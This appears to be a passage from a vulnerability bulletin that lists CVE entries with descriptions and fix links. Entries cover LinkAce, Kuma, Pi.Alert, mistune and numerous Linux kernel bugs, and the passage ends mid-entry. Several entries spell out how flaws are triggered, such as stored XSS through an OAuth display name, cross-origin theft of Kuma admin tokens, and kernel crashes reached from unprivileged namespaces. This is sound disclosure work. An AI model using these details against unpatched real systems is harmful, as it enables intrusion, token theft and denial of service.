| Kovah--LinkAce | LinkAce is a self-hosted archive to collect website links. Prior to 2.5.6, LinkAce contains a stored cross-site scripting vulnerability that allows a low-privilege user to execute arbitrary JavaScript in an administrator's browser session. This affects instances configured with SSO/OAuth authentication, which is one of the supported authentication methods in LinkAce. An attacker who sets their OAuth display name to a malicious script and then creates an API token will plant a persistent XSS payload in the audit log. When any admin navigates to /system/audit, the payload executes in the admin's browser context. This enables session cookie theft, CSRF token exfiltration (exposed in the la-app-data meta tag), or any other action the admin can perform. This vulnerability is fixed in 2.5.6. | 2026-05-28 | not yet calculated | CVE-2026-45343 | https://github.com/Kovah/LinkAce/security/advisories/GHSA-jx4g-ph82-x9mm |
| Krajowa Izba Rozliczeniowa--Szafir SDK | Szafir SDK returns a success status code from the cryptographic digital signature verification process (i.e. /VerifyingTaskItem/Signature/VerificationResult/Result/@code == 0, "Positively verified") even when the trust status of the signer's certificate could not be established (i.e. /VerifyingTaskItem/Signature/VerificationResult/SigningCertificate/@certificateType == "nondetermined"). This causes consuming applications to incorrectly treat the signature as valid despite an unverified certificate chain, enabling authentication bypass and user impersonation. This issue was fixed in version 463. | 2026-05-25 | not yet calculated | CVE-2026-9058 | https://cert.pl/posts/2026/05/CVE-2026-9058 https://www.elektronicznypodpis.pl/ |
| kumahq--kuma | Kuma is a modern Envoy-based service mesh that can run on every cloud across both Kubernetes and VMs. Prior to 2.7.25, 2.9.15, 2.11.13, 2.12.10, and 2.13.5, the default kuma-cp config leaks the admin bootstrap token and signing keys to any webpage the operator visits while the control plane is reachable from their browser. CorsAllowedDomains: [".*"] reflects any Origin, and LocalhostIsAdmin: true promotes requests from 127.0.0.1 to mesh-system:admin. A cross-origin fetch() from a malicious page returns the admin JWT and signing material. This vulnerability is fixed in 2.7.25, 2.9.15, 2.11.13, 2.12.10, and 2.13.5. | 2026-05-28 | not yet calculated | CVE-2026-45021 | https://github.com/kumahq/kuma/security/advisories/GHSA-3vcp-chfh-f6r2 https://github.com/kumahq/kuma/pull/16416 https://github.com/kumahq/kuma/pull/16423 https://github.com/kumahq/kuma/pull/16424 https://github.com/kumahq/kuma/pull/16425 https://github.com/kumahq/kuma/pull/16426 https://github.com/kumahq/kuma/pull/16427 https://github.com/kumahq/kuma/commit/8fefa8595d44eb68d922405702ed7a0826322907 |
| kvf-admin--kvf-admin | Insecure Permissions vulnerability in kvf-admin v1.0.0 allows a remote attacker to escalate privileges via the UserController.java component | 2026-05-27 | not yet calculated | CVE-2026-38807 | https://github.com/cagexunxi/CVE/issues/1 |
| leiweibau--Pi.Alert | Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. From 2024-06-29 to before 2026-05-07, the web application endpoint is vulnerable to SQL injection. The /pialert/php/server/devices.php route accepts requests from unauthenticated users when the action URL parameter is set to getDevicesTotals. The scansource URL parameter is then injected in a SQL query. This vulnerability is fixed in 2026-05-07. | 2026-05-27 | not yet calculated | CVE-2026-44886 | https://github.com/leiweibau/Pi.Alert/security/advisories/GHSA-m929-j7w8-334j |
| lepture--mistune | Mistune is a Python Markdown parser with renderers and plugins. In 3.2.0 and realier, in src/mistune/directives/image.py, the render_figure() function concatenates figclass and figwidth options directly into HTML attributes without escaping. This allows attribute injection and XSS even when HTMLRenderer(escape=True) is used, because these values bypass the inline renderer. | 2026-05-26 | not yet calculated | CVE-2026-44896 | https://github.com/lepture/mistune/security/advisories/GHSA-58cw-g322-p94v |
| libjxl--libjxl | Heap buffer overflow vulnerability in libjxl 0.12.0 via crafted PBM images to the jxl::extras::DecodeImagePNM function in file lib/extras/dec/pnm.cc. | 2026-05-27 | not yet calculated | CVE-2025-70103 | https://github.com/libjxl/libjxl/issues/4337 https://github.com/libjxl/libjxl/pull/4338 https://github.com/sigdevel/pocs/blob/main/res/libjxl/2025/2 https://infosec.exchange/@sigdevel/116642233929409910 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix race condition when checking rpm_on When autosuspend is triggered, driver rpm_on flag is set to indicate that a suspend/resume is already in progress. However, when a userspace application submits a command during this narrow window, amdxdna_pm_resume_get() may incorrectly skip the resume operation because the rpm_on flag is still set. This results in commands being submitted while the device has not actually resumed, causing unexpected behavior. The set_dpm() is called by suspend/resume, it relied on rpm_on flag to avoid calling into rpm suspend/resume recursivly. So to fix this, remove the use of the rpm_on flag entirely. Instead, introduce aie2_pm_set_dpm() which explicitly resumes the device before invoking set_dpm(). With this change, set_dpm() is called directly inside the suspend or resume execution path. Otherwise, aie2_pm_set_dpm() is called. | 2026-05-27 | not yet calculated | CVE-2025-71303 | https://git.kernel.org/stable/c/e7cb75b6a5127d78298e39750b4f3185eca0dafc https://git.kernel.org/stable/c/00ffe45ece80160aef446d74ded906352f21dd72 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smack: /smack/doi: accept previously used values Writing to /smack/doi a value that has ever been written there in the past disables networking for non-ambient labels. E.g. # cat /smack/doi 3 # netlabelctl -p cipso list Configured CIPSO mappings (1) DOI value : 3 mapping type : PASS_THROUGH # netlabelctl -p map list Configured NetLabel domain mappings (3) domain: "_" (IPv4) protocol: UNLABELED domain: DEFAULT (IPv4) protocol: CIPSO, DOI = 3 domain: DEFAULT (IPv6) protocol: UNLABELED # cat /smack/ambient _ # cat /proc/$$/attr/smack/current _ # ping -c1 10.1.95.12 64 bytes from 10.1.95.12: icmp_seq=1 ttl=64 time=0.964 ms # echo foo >/proc/$$/attr/smack/current # ping -c1 10.1.95.12 64 bytes from 10.1.95.12: icmp_seq=1 ttl=64 time=0.956 ms unknown option 86 # echo 4 >/smack/doi # echo 3 >/smack/doi !> [ 214.050395] smk_cipso_doi:691 cipso add rc = -17 # echo 3 >/smack/doi !> [ 249.402261] smk_cipso_doi:678 remove rc = -2 !> [ 249.402261] smk_cipso_doi:691 cipso add rc = -17 # ping -c1 10.1.95.12 !!> ping: 10.1.95.12: Address family for hostname not supported # echo _ >/proc/$$/attr/smack/current # ping -c1 10.1.95.12 64 bytes from 10.1.95.12: icmp_seq=1 ttl=64 time=0.617 ms This happens because Smack keeps decommissioned DOIs, fails to re-add them, and consequently refuses to add the "default" domain map: # netlabelctl -p cipso list Configured CIPSO mappings (2) DOI value : 3 mapping type : PASS_THROUGH DOI value : 4 mapping type : PASS_THROUGH # netlabelctl -p map list Configured NetLabel domain mappings (2) domain: "_" (IPv4) protocol: UNLABELED !> (no ipv4 map for default domain here) domain: DEFAULT (IPv6) protocol: UNLABELED Fix by clearing decommissioned DOI definitions and serializing concurrent DOI updates with a new lock. Also: - allow /smack/doi to live unconfigured, since adding a map (netlbl_cfg_cipsov4_map_add) may fail. CIPSO_V4_DOI_UNKNOWN(0) indicates the unconfigured DOI - add new DOI before removing the old default map, so the old map remains if the add fails (2008-02-04, Casey Schaufler) | 2026-05-27 | not yet calculated | CVE-2025-71304 | https://git.kernel.org/stable/c/eb718a3c8181ada679340db34cd61bce48e44749 https://git.kernel.org/stable/c/6ec091c5c7eeabd249a7c46813cad1e9f555f859 https://git.kernel.org/stable/c/199452f22d2f74b897fe826f81ec402b0a8461a0 https://git.kernel.org/stable/c/1c7ee23dfcd18d80770d8f90f2ab5bb1b2bfd8a3 https://git.kernel.org/stable/c/f8071500177f38cff38892bd85ac631cc6e010b2 https://git.kernel.org/stable/c/5a247a84de0ba44edbbd6be851c8a6b2aa60ff85 https://git.kernel.org/stable/c/8beebb8ad9a003f978e53b06237986588223e15e https://git.kernel.org/stable/c/33d589ed60ae433b483761987b85e0d24e54584e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/display/dp_mst: Add protection against 0 vcpi When releasing a timeslot there is a slight chance we may end up with the wrong payload mask due to overflow if the delayed_destroy_work ends up coming into play after a DP 2.1 monitor gets disconnected which causes vcpi to become 0 then we try to make the payload = ~BIT(vcpi - 1) which is a negative shift. VCPI id should never really be 0 hence skip changing the payload mask if VCPI is 0. Otherwise it leads to <7> [515.287237] xe 0000:03:00.0: [drm:drm_dp_mst_get_port_malloc [drm_display_helper]] port ffff888126ce9000 (3) <4> [515.287267] -----------[ cut here ]----------- <3> [515.287268] UBSAN: shift-out-of-bounds in ../drivers/gpu/drm/display/drm_dp_mst_topology.c:4575:36 <3> [515.287271] shift exponent -1 is negative <4> [515.287275] CPU: 7 UID: 0 PID: 3108 Comm: kworker/u64:33 Tainted: G S U 6.17.0-rc6-lgci-xe-xe-3795-3e79699fa1b216e92+ #1 PREEMPT(voluntary) <4> [515.287279] Tainted: [S]=CPU_OUT_OF_SPEC, [U]=USER <4> [515.287279] Hardware name: ASUS System Product Name/PRIME Z790-P WIFI, BIOS 1645 03/15/2024 <4> [515.287281] Workqueue: drm_dp_mst_wq drm_dp_delayed_destroy_work [drm_display_helper] <4> [515.287303] Call Trace: <4> [515.287304] <TASK> <4> [515.287306] dump_stack_lvl+0xc1/0xf0 <4> [515.287313] dump_stack+0x10/0x20 <4> [515.287316] __ubsan_handle_shift_out_of_bounds+0x133/0x2e0 <4> [515.287324] ? drm_atomic_get_private_obj_state+0x186/0x1d0 <4> [515.287333] drm_dp_atomic_release_time_slots.cold+0x17/0x3d [drm_display_helper] <4> [515.287355] mst_connector_atomic_check+0x159/0x180 [xe] <4> [515.287546] drm_atomic_helper_check_modeset+0x4d9/0xfa0 <4> [515.287550] ? __ww_mutex_lock.constprop.0+0x6f/0x1a60 <4> [515.287562] intel_atomic_check+0x119/0x2b80 [xe] <4> [515.287740] ? find_held_lock+0x31/0x90 <4> [515.287747] ? lock_release+0xce/0x2a0 <4> [515.287754] drm_atomic_check_only+0x6a2/0xb40 <4> [515.287758] ? drm_atomic_add_affected_connectors+0x12b/0x140 <4> [515.287765] drm_atomic_commit+0x6e/0xf0 <4> [515.287766] ? _pfx__drm_printfn_info+0x10/0x10 <4> [515.287774] drm_client_modeset_commit_atomic+0x25c/0x2b0 <4> [515.287794] drm_client_modeset_commit_locked+0x60/0x1b0 <4> [515.287795] ? mutex_lock_nested+0x1b/0x30 <4> [515.287801] drm_client_modeset_commit+0x26/0x50 <4> [515.287804] __drm_fb_helper_restore_fbdev_mode_unlocked+0xdc/0x110 <4> [515.287810] drm_fb_helper_hotplug_event+0x120/0x140 <4> [515.287814] drm_fbdev_client_hotplug+0x28/0xd0 <4> [515.287819] drm_client_hotplug+0x6c/0xf0 <4> [515.287824] drm_client_dev_hotplug+0x9e/0xd0 <4> [515.287829] drm_kms_helper_hotplug_event+0x1a/0x30 <4> [515.287834] drm_dp_delayed_destroy_work+0x3df/0x410 [drm_display_helper] <4> [515.287861] process_one_work+0x22b/0x6f0 <4> [515.287874] worker_thread+0x1e8/0x3d0 <4> [515.287879] ? __pfx_worker_thread+0x10/0x10 <4> [515.287882] kthread+0x11c/0x250 <4> [515.287886] ? __pfx_kthread+0x10/0x10 <4> [515.287890] ret_from_fork+0x2d7/0x310 <4> [515.287894] ? __pfx_kthread+0x10/0x10 <4> [515.287897] ret_from_fork_asm+0x1a/0x30 | 2026-05-27 | not yet calculated | CVE-2025-71305 | https://git.kernel.org/stable/c/95dbd525efce2a9e9e1c50ad15213de644c85ad0 https://git.kernel.org/stable/c/ac9a7c329a5610051fc476644c9b9145a5965ecb https://git.kernel.org/stable/c/3f44cdb5371faf225af37d5caba8f21ec0572469 https://git.kernel.org/stable/c/4d2ccdea18b564e3f73e3e543854acea64e6277d https://git.kernel.org/stable/c/d6afc7539ce06dadfa5b4787b3cfe79b95d8f67a https://git.kernel.org/stable/c/342ccffd9f77fc29fe1c05fd145e4d842bd2feaa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ima: Fix stack-out-of-bounds in is_bprm_creds_for_exec() KASAN reported a stack-out-of-bounds access in ima_appraise_measurement from is_bprm_creds_for_exec: BUG: KASAN: stack-out-of-bounds in ima_appraise_measurement+0x12dc/0x16a0 Read of size 1 at addr ffffc9000160f940 by task sudo/550 The buggy address belongs to stack of task sudo/550 and is located at offset 24 in frame: ima_appraise_measurement+0x0/0x16a0 This frame has 2 objects: [48, 56) 'file' [80, 148) 'hash' This is caused by using container_of on the *file pointer. This offset calculation is what triggers the stack-out-of-bounds error. In order to fix this, pass in a bprm_is_check boolean which can be set depending on how process_measurement is called. If the caller has a linux_binprm pointer and the function is BPRM_CHECK we can determine is_check and set it then. Otherwise set it to false. | 2026-05-27 | not yet calculated | CVE-2025-71306 | https://git.kernel.org/stable/c/ab3d16da982a4ebb715d487dbf9dd66e3990d935 https://git.kernel.org/stable/c/377cae9851e8559e9d8b82a78c1ac0abeb18839c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/panthor: Fix NULL pointer dereference on panthor_fw_unplug This patch removes the MCU halt and wait for halt procedures during panthor_fw_unplug() as the MCU can be in a variety of states or the FW may not even be loaded/initialized at all, the latter of which can lead to a NULL pointer dereference. It should be safe on unplug to just disable the MCU without waiting for it to halt as it may not be able to. | 2026-05-27 | not yet calculated | CVE-2025-71307 | https://git.kernel.org/stable/c/aab8b8a42e206a399fe3a5ed4b4cbb45ff6c546c https://git.kernel.org/stable/c/920c6af98e98e6afedf6318a75bac95af8415c6c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix potential NULL pointer dereference in context cleanup aie_destroy_context() is invoked during error handling in aie2_create_context(). However, aie_destroy_context() assumes that the context's mailbox channel pointer is non-NULL. If mailbox channel creation fails, the pointer remains NULL and calling aie_destroy_context() can lead to a NULL pointer dereference. In aie2_create_context(), replace aie_destroy_context() with a function which request firmware to remove the context created previously. | 2026-05-27 | not yet calculated | CVE-2025-71308 | https://git.kernel.org/stable/c/2611c9616cb52d3ed54a6095d72d18e645a6955a https://git.kernel.org/stable/c/97f27573837ef96b4ba42af463cc800cab615c0e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: fix deadlock in ni_read_folio_cmpr Syzbot reported a task hung in ni_readpage_cmpr (now ni_read_folio_cmpr). This is caused by a lock inversion deadlock involving the inode mutex (ni_lock) and page locks. Scenario: 1. Task A enters ntfs_read_folio() for page X. It acquires ni_lock. 2. Task A calls ni_read_folio_cmpr(), which attempts to lock all pages in the compressed frame (including page Y). 3. Concurrently, Task B (e.g., via readahead) has locked page Y and calls ntfs_read_folio(). 4. Task B waits for ni_lock (held by A). 5. Task A waits for page Y lock (held by B). -> DEADLOCK. The fix is to restructure locking: do not take ni_lock in ntfs_read_folio(). Instead, acquire ni_lock inside ni_read_folio_cmpr() ONLY AFTER all required page locks for the frame have been successfully acquired. This restores the correct lock ordering (Page Lock -> ni_lock) consistent with VFS. [almaz.alexandrovich@paragon-software.com: ni_readpage_cmpr was renamed to ni_read_folio_cmpr] | 2026-05-27 | not yet calculated | CVE-2025-71309 | https://git.kernel.org/stable/c/cfe246b318106e1691bd6c9466c739e8559d25c2 https://git.kernel.org/stable/c/e37a75bb866c29da954b51d0dd7670406246d9ee |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: Initialize new folios before use KMSAN reports an uninitialized value in longest_match_std(), invoked from ntfs_compress_write(). When new folios are allocated without being marked uptodate and ni_read_frame() is skipped because the caller expects the frame to be completely overwritten, some reserved folios may remain only partially filled, leaving the rest memory uninitialized. | 2026-05-27 | not yet calculated | CVE-2025-71311 | https://git.kernel.org/stable/c/dd6c81527d097b3b0bf5a15c2fdc9657d045144c https://git.kernel.org/stable/c/5a30cc03bde169ad558695b26da6ea7e55f6194a https://git.kernel.org/stable/c/41d79f8e2a36622d148719bf7c18b46ac1264284 https://git.kernel.org/stable/c/f223ebffa185cc8da934333c5a31ff2d4f992dc9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs/ntfs3: fix ntfs_mount_options leak in ntfs_fill_super() In ntfs_fill_super(), the fc->fs_private pointer is set to NULL without first freeing the memory it points to. This causes the subsequent call to ntfs_fs_free() to skip freeing the ntfs_mount_options structure. This results in a kmemleak report: unreferenced object 0xff1100015378b800 (size 32): comm "mount", pid 582, jiffies 4294890685 hex dump (first 32 bytes): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 ed ff ed ff 00 04 00 00 ................ backtrace (crc ed541d8c): __kmalloc_cache_noprof+0x424/0x5a0 __ntfs_init_fs_context+0x47/0x590 alloc_fs_context+0x5d8/0x960 __x64_sys_fsopen+0xb1/0x190 do_syscall_64+0x50/0x1f0 entry_SYSCALL_64_after_hwframe+0x76/0x7e This issue can be reproduced using the following commands: fallocate -l 100M test.file mount test.file /tmp/test Since sbi->options is duplicated from fc->fs_private and does not directly use the memory allocated for fs_private, it is unnecessary to set fc->fs_private to NULL. Additionally, this patch simplifies the code by utilizing the helper function put_mount_options() instead of open-coding the cleanup logic. | 2026-05-27 | not yet calculated | CVE-2025-71312 | https://git.kernel.org/stable/c/dac871d833b09495198dcac81d2ebaa8db11acbc https://git.kernel.org/stable/c/f7edab0cee03a1cbe0e55a7bcab8d2d8b6b74278 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix null-ptr-deref in l2cap_sock_state_change_cb() Add the same NULL guard already present in l2cap_sock_resume_cb() and l2cap_sock_ready_cb(). | 2026-05-26 | not yet calculated | CVE-2026-45834 | https://git.kernel.org/stable/c/5105f3e6b2df619c635b5f6a49fac131a36c7952 https://git.kernel.org/stable/c/c88c185ae0a1067823661b220aeea613df2c127b https://git.kernel.org/stable/c/1810e42ff6716f320c7269d5850eca48b07b7427 https://git.kernel.org/stable/c/a2dcf1a61d056aef15b63c6eae9441344d624389 https://git.kernel.org/stable/c/2ff1a41a912de8517b4482e946dd951b7d80edbf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix null-ptr-deref in l2cap_sock_new_connection_cb() Add the same NULL guard already present in l2cap_sock_resume_cb() and l2cap_sock_ready_cb(). | 2026-05-26 | not yet calculated | CVE-2026-45835 | https://git.kernel.org/stable/c/ab77c8bc30269bee15d917059a66bea48909f5f0 https://git.kernel.org/stable/c/bc3bb9f40da8e53896abc2d29c6d0c6686fe4ab9 https://git.kernel.org/stable/c/741e6024e31587b0c021b6616a9e428a4ea0b64a https://git.kernel.org/stable/c/76083fb80f5a38ac13326b2d810f66bd07771eea https://git.kernel.org/stable/c/0a120d96166301d7a95be75b52f843837dbd1219 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: Fix null-ptr-deref in l2cap_sock_get_sndtimeo_cb() Add the same NULL guard already present in l2cap_sock_resume_cb() and l2cap_sock_ready_cb(). | 2026-05-26 | not yet calculated | CVE-2026-45836 | https://git.kernel.org/stable/c/cf1fd517f892ded88168df878f834b625133f86d https://git.kernel.org/stable/c/58dc5e3d8768e121907608e6e196a908512fb083 https://git.kernel.org/stable/c/32bd343803d4ba47cc516f9d5f037f01b855d767 https://git.kernel.org/stable/c/a93d66907dd4d29b65c9797a93784bf61906d6d6 https://git.kernel.org/stable/c/78a88d43dab8d23aeef934ed8ce34d40e6b3d613 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix use-after-free in arena_vm_close on fork arena_vm_open() only bumps vml->mmap_count but never registers the child VMA in arena->vma_list. The vml->vma always points at the parent VMA, so after parent munmap the pointer dangles. If the child then calls bpf_arena_free_pages(), zap_pages() reads the stale vml->vma triggering use-after-free. Fix this by preventing the arena VMA from being inherited across fork with VM_DONTCOPY, and preventing VMA splits via the may_split callback. Also reject mremap with a .mremap callback returning -EINVAL. A same-size mremap(MREMAP_FIXED) on the full arena VMA reaches copy_vma() through the following path: check_prep_vma() - returns 0 early: new_len == old_len skips VM_DONTEXPAND check prep_move_vma() - vm_start == old_addr and vm_end == old_addr + old_len so may_split is never called move_vma() copy_vma_and_data() copy_vma() vm_area_dup() - copies vm_private_data (vml pointer) vm_ops->open() - bumps vml->mmap_count vm_ops->mremap() - returns -EINVAL, rollback unmaps new VMA The refcount ensures the rollback's arena_vm_close does not free the vml shared with the original VMA. | 2026-05-27 | not yet calculated | CVE-2026-45837 | https://git.kernel.org/stable/c/723b9fa930cc277c15ce6b9ec9feec828cfac9d7 https://git.kernel.org/stable/c/d18099f19e53250f8ad2801498b88cec29d9107a https://git.kernel.org/stable/c/201128fcc7b213d27ab77bc4e89488b41796480f https://git.kernel.org/stable/c/4fddde2a732de60bb97e3307d4eb69ac5f1d2b74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: fix end-of-list detection in cgroup_storage_get_next_key() list_next_entry() never returns NULL -- when the current element is the last entry it wraps to the list head via container_of(). The subsequent NULL check is therefore dead code and get_next_key() never returns -ENOENT for the last element, instead reading storage->key from a bogus pointer that aliases internal map fields and copying the result to userspace. Replace it with list_entry_is_head() so the function correctly returns -ENOENT when there are no more entries. | 2026-05-27 | not yet calculated | CVE-2026-45838 | https://git.kernel.org/stable/c/b4b5a20bed82130da2f2818f04d52378952fbd0b https://git.kernel.org/stable/c/85a2f30e40f7468db732f55659bc6318874f49af https://git.kernel.org/stable/c/32ce55d424395904986f5066f8755f6cb9993377 https://git.kernel.org/stable/c/fc39753b7f92e09177777e9c648afe5aa3abb81f https://git.kernel.org/stable/c/5828b9e5b272ecff7cf5d345128d3de7324117f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: reject negative CO-RE accessor indices in bpf_core_parse_spec() CO-RE accessor strings are colon-separated indices that describe a path from a root BTF type to a target field, e.g. "0:1:2" walks through nested struct members. bpf_core_parse_spec() parses each component with sscanf("%d"), so negative values like -1 are silently accepted. The subsequent bounds checks (access_idx >= btf_vlen(t)) only guard the upper bound and always pass for negative values because C integer promotion converts the __u16 btf_vlen result to int, making the comparison (int)(-1) >= (int)(N) false for any positive N. When -1 reaches btf_member_bit_offset() it gets cast to u32 0xffffffff, producing an out-of-bounds read far past the members array. A crafted BPF program with a negative CO-RE accessor on any struct that exists in vmlinux BTF (e.g. task_struct) crashes the kernel deterministically during BPF_PROG_LOAD on any system with CONFIG_DEBUG_INFO_BTF=y (default on major distributions). The bug is reachable with CAP_BPF: BUG: unable to handle page fault for address: ffffed11818b6626 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page Oops: Oops: 0000 [#1] SMP KASAN NOPTI CPU: 0 UID: 0 PID: 85 Comm: poc Not tainted 7.0.0-rc6 #18 PREEMPT(full) RIP: 0010:bpf_core_parse_spec (tools/lib/bpf/relo_core.c:354) RAX: 00000000ffffffff Call Trace: <TASK> bpf_core_calc_relo_insn (tools/lib/bpf/relo_core.c:1321) bpf_core_apply (kernel/bpf/btf.c:9507) check_core_relo (kernel/bpf/verifier.c:19475) bpf_check (kernel/bpf/verifier.c:26031) bpf_prog_load (kernel/bpf/syscall.c:3089) __sys_bpf (kernel/bpf/syscall.c:6228) </TASK> CO-RE accessor indices are inherently non-negative (struct member index, array element index, or enumerator index), so reject them immediately after parsing. | 2026-05-27 | not yet calculated | CVE-2026-45839 | https://git.kernel.org/stable/c/3ff85ae79e1a74baeb916b78a63d821f6d19a994 https://git.kernel.org/stable/c/36a9012f76ba8d9189ae56a1f8bb7c87c07a1f3a https://git.kernel.org/stable/c/76f2ebaf79a9ae6d0737b87f045fe769e425d78f https://git.kernel.org/stable/c/99dbab7b5a12d8f58d5b0aa2f7a1fe656a70f4b2 https://git.kernel.org/stable/c/1c22483a2c4bbf747787f328392ca3e68619c4dc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: openvswitch: cap upcall PID array size and pre-size vport replies The vport netlink reply helpers allocate a fixed-size skb with nlmsg_new(NLMSG_DEFAULT_SIZE, ...) but serialize the full upcall PID array via ovs_vport_get_upcall_portids(). Since ovs_vport_set_upcall_portids() accepts any non-zero multiple of sizeof(u32) with no upper bound, a CAP_NET_ADMIN user can install a PID array large enough to overflow the reply buffer, causing nla_put() to fail with -EMSGSIZE and hitting BUG_ON(err < 0). On systems with unprivileged user namespaces enabled (e.g., Ubuntu default), this is reachable via unshare -Urn since OVS vport mutation operations use GENL_UNS_ADMIN_PERM. kernel BUG at net/openvswitch/datapath.c:2414! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI CPU: 1 UID: 0 PID: 65 Comm: poc Not tainted 7.0.0-rc7-00195-geb216e422044 #1 RIP: 0010:ovs_vport_cmd_set+0x34c/0x400 Call Trace: <TASK> genl_family_rcv_msg_doit (net/netlink/genetlink.c:1116) genl_rcv_msg (net/netlink/genetlink.c:1194) netlink_rcv_skb (net/netlink/af_netlink.c:2550) genl_rcv (net/netlink/genetlink.c:1219) netlink_unicast (net/netlink/af_netlink.c:1344) netlink_sendmsg (net/netlink/af_netlink.c:1894) __sys_sendto (net/socket.c:2206) __x64_sys_sendto (net/socket.c:2209) do_syscall_64 (arch/x86/entry/syscall_64.c:63) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) </TASK> Kernel panic - not syncing: Fatal exception Reject attempts to set more PIDs than nr_cpu_ids in ovs_vport_set_upcall_portids(), and pre-compute the worst-case reply size in ovs_vport_cmd_msg_size() based on that bound, similar to the existing ovs_dp_cmd_msg_size(). nr_cpu_ids matches the cap already used by the per-CPU dispatch configuration on the datapath side (ovs_dp_cmd_fill_info() serialises at most nr_cpu_ids PIDs), so the two sides stay consistent. | 2026-05-27 | not yet calculated | CVE-2026-45840 | https://git.kernel.org/stable/c/f9ef3db77a383d66847fd082c2b437d8ae4d9c63 https://git.kernel.org/stable/c/f99ac36b5d7c719d08a69fcdecce40f78a874e15 https://git.kernel.org/stable/c/fa6e90bc443bed8dc0d55bc5ea5b27ffdfe37704 https://git.kernel.org/stable/c/1d6c02b86329883aa467a3a61f8d34369db73a2f https://git.kernel.org/stable/c/2091c6aa0df6aba47deb5c8ab232b1cb60af3519 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_osf: fix divide-by-zero in OSF_WSS_MODULO nf_osf_match_one() computes ctx->window % f->wss.val in the OSF_WSS_MODULO branch with no guard for f->wss.val == 0. A CAP_NET_ADMIN user can add such a fingerprint via nfnetlink; a subsequent matching TCP SYN divides by zero and panics the kernel. Reject the bogus fingerprint in nfnl_osf_add_callback() above the per-option for-loop. f->wss is per-fingerprint, not per-option, so the check must run regardless of f->opt_num (including 0). Also reject wss.wc >= OSF_WSS_MAX; nf_osf_match_one() already treats that as "should not happen". Crash: Oops: divide error: 0000 [#1] SMP KASAN NOPTI RIP: 0010:nf_osf_match_one (net/netfilter/nfnetlink_osf.c:98) Call Trace: <IRQ> nf_osf_match (net/netfilter/nfnetlink_osf.c:220) xt_osf_match_packet (net/netfilter/xt_osf.c:32) ipt_do_table (net/ipv4/netfilter/ip_tables.c:348) nf_hook_slow (net/netfilter/core.c:622) ip_local_deliver (net/ipv4/ip_input.c:265) ip_rcv (include/linux/skbuff.h:1162) __netif_receive_skb_one_core (net/core/dev.c:6181) process_backlog (net/core/dev.c:6642) __napi_poll (net/core/dev.c:7710) net_rx_action (net/core/dev.c:7945) handle_softirqs (kernel/softirq.c:622) | 2026-05-27 | not yet calculated | CVE-2026-45841 | https://git.kernel.org/stable/c/8def8fbd23f40e945febe913d04b731012ce0082 https://git.kernel.org/stable/c/c55940895245d8ef658ab381248a28755218d625 https://git.kernel.org/stable/c/fb965b1cfe92b28d28b5ebe3116b81dbef9f2d2f https://git.kernel.org/stable/c/9a05e195618a6d474f2bcd5b6376d0ffc2f00366 https://git.kernel.org/stable/c/2195574dc6d9017d32ac346987e12659f931d932 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: slip: reject VJ receive packets on instances with no rstate array slhc_init() accepts rslots == 0 as a valid configuration, with the documented meaning of 'no receive compression'. In that case the allocation loop in slhc_init() is skipped, so comp->rstate stays NULL and comp->rslot_limit stays 0 (from the kzalloc of struct slcompress). The receive helpers do not defend against that configuration. slhc_uncompress() dereferences comp->rstate[x] when the VJ header carries an explicit connection ID, and slhc_remember() later assigns cs = &comp->rstate[...] after only comparing the packet's slot number to comp->rslot_limit. Because rslot_limit is 0, slot 0 passes the range check, and the code dereferences a NULL rstate. The configuration is reachable in-tree through PPP. PPPIOCSMAXCID stores its argument in a signed int, and (val >> 16) uses arithmetic shift. Passing 0xffff0000 therefore sign-extends to -1, so val2 + 1 is 0 and ppp_generic.c ends up calling slhc_init(0, 1). Because /dev/ppp open is gated by ns_capable(CAP_NET_ADMIN), the whole path is reachable from an unprivileged user namespace. Once the malformed VJ state is installed, any inbound VJ-compressed or VJ-uncompressed frame that selects slot 0 crashes the kernel in softirq context: Oops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI KASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007] RIP: 0010:slhc_uncompress (drivers/net/slip/slhc.c:519) Call Trace: <TASK> ppp_receive_nonmp_frame (drivers/net/ppp/ppp_generic.c:2466) ppp_input (drivers/net/ppp/ppp_generic.c:2359) ppp_async_process (drivers/net/ppp/ppp_async.c:492) tasklet_action_common (kernel/softirq.c:926) handle_softirqs (kernel/softirq.c:623) run_ksoftirqd (kernel/softirq.c:1055) smpboot_thread_fn (kernel/smpboot.c:160) kthread (kernel/kthread.c:436) ret_from_fork (arch/x86/kernel/process.c:164) </TASK> Reject the receive side on such instances instead of touching rstate. slhc_uncompress() falls through to its existing 'bad' label, which bumps sls_i_error and enters the toss state. slhc_remember() mirrors that with an explicit sls_i_error increment followed by slhc_toss(); the sls_i_runt counter is not used here because a missing rstate is an internal configuration state, not a runt packet. The transmit path is unaffected: the only in-tree caller that picks rslots from userspace (ppp_generic.c) still supplies tslots >= 1, and slip.c always calls slhc_init(16, 16), so comp->tstate remains valid and slhc_compress() continues to work. | 